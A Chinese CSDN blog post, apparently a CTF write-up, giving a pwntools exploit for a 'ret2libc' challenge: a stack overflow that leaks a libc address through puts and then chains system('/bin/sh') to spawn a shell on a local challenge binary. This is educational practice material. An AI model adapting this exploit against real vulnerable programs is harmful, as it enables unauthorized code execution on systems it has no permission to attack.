PWN:[WEEK2]ret2libc

最新推荐文章于 2024-07-08 17:37:27 发布
最新推荐文章于 2024-07-08 17:37:27 发布
阅读量197 收藏
点赞数
分类专栏: pwn 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53932372/article/details/127415516
版权

现在来看,这些内容简单的不得了,但是自己却为此二不断的苦恼,甚至把学校的ctf群都退出来,来表达自己的愤懑。

庆幸自己不断向前走吧。

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
elf = ELF('./ret2libc')

def look(sh):
	gdb.attach(sh)
	pause()


poprdi = next(elf.search(asm('pop rdi;ret')))
ret = next(elf.search(asm('ret')))
sh = process('./ret2libc')
payload = b'a'*0x108 + p64(poprdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['vuln'])
sh.sendlineafter(b'Input:\n',payload) 

sleep(1)

libc = ELF('./libc-2.31.so')
libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
libc.address = libc_base

binsh = next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x108 + p64(poprdi) + p64(binsh) + p64(ret)+p64(libc.sym['system'])
look(sh)
sh.sendline(payload)

sh.interactive()
we have a whole life
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4392
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
pwn07.ret2syscall例题
11-11
ret2syscall例题
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 560
BUUCTF--pwn--jarvisoj_level3_x64
字符串溢出(pwn溢出)--ret2libc
莫慌的博客
09-29 418
pwn入门
PWN · ret2libc】[BJDCTF 2020]babyrop
Mr_Fmnwon的博客
07-24 191
简单而纯粹的ret2libc,更推荐上面那篇博客哦~相当于在这题基础上又加了一些保护,算是plus版前些日子为了准备期末考,长时间没有进行CTF-PWN的学习。而ret2libc一直都是不太熟练地点。多刷多总结。加油!
PWN · ret2csu】[HNCTF 2022 WEEK2]ret2csu
Mr_Fmnwon的博客
11-11 466
记一道ret2csu。
PWN:[WEEK2]ret2csu
m0_53932372的博客
10-19 207
pwn
hnctf-pwn-week2
m0_64174759的博客
11-26 903
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
堆溢出ret2libc
最新发布
yjh_fnu_ltn的博客
07-08 298
利用思路,先申请2个heap,用heap0的edit函数来覆盖heap1的content地址使其指向存放put函数地址的堆空间,再调用heap1的show函数,即可泄漏put函数的真实地址。成功覆盖,put函数在调用时会直接用支付穿输出0x000055df3bd91080处的内容,遇到b’\x00‘才停止。利用栈溢出覆盖put参数泄漏libc基地址,再第二次用system的地址覆盖put函数,实现ret2libc
NewStarCTF 2023 [WEEK 2] PWN
Xzzzz911的博客
10-15 1174
第二周题目上难度了,有几题做的比较棘手不会做>_
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwntools:类型转换
m0_53932372的博客
09-08 4788
byte和str 首先一定要注意,byte和str在python里面有明确的区分,尤其是在做pwn的题目时,一定要注意这个问题。 参考链接:https://www.cnblogs.com/mlgjb/p/7899534.html hex hex(x) x -- 10进制整数 返回16进制数,以字符串形式表示。 p32、p64 p32(x) x-- 一个整型数据 返回byte型。 u32、u64 u32(x) x-- byte型 返回整型。 int类型转换 int(a,base=x)
PWN:pwntools的安装
m0_53932372的博客
07-01 2357
pwntools sudo apt update sudo apt install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential (安装pip3) pip3 -v (查看版本) pip换源 在根目录下创建文件夹: .pip 在.pip里创建文件: pip.conf 自行安装vim sudo apt vim 使用vim libcsearch pwndbg peda gef ......
攻防世界:PWN刷题-forgot
m0_53932372的博客
12-30 2259
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
PWN:栈溢出----偏移的计算
m0_53932372的博客
08-03 2015
就目前遇到的栈溢出题目而言,使用ida就可以完成便宜的计算。 这些栈溢出题目,基本上不需要调试,ida本身提供的栈空间数据就可以实现偏移的计算。 BUUCTF:bjdctf_2020_babystack2 这道题目,我们看ida: 具体做法不细说,主要看偏移: buf和nbyte 看栈空间: 下方没有s只有r,而r就是返回地址 给了后门函数,那就利用read函数,达到缓冲区溢出的目的。 +0x8-(-0x10)=0x18=24 偏移就是二十四。 以上只是本人拙见,栈溢出偏移困扰了我很久,希望这次不会
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值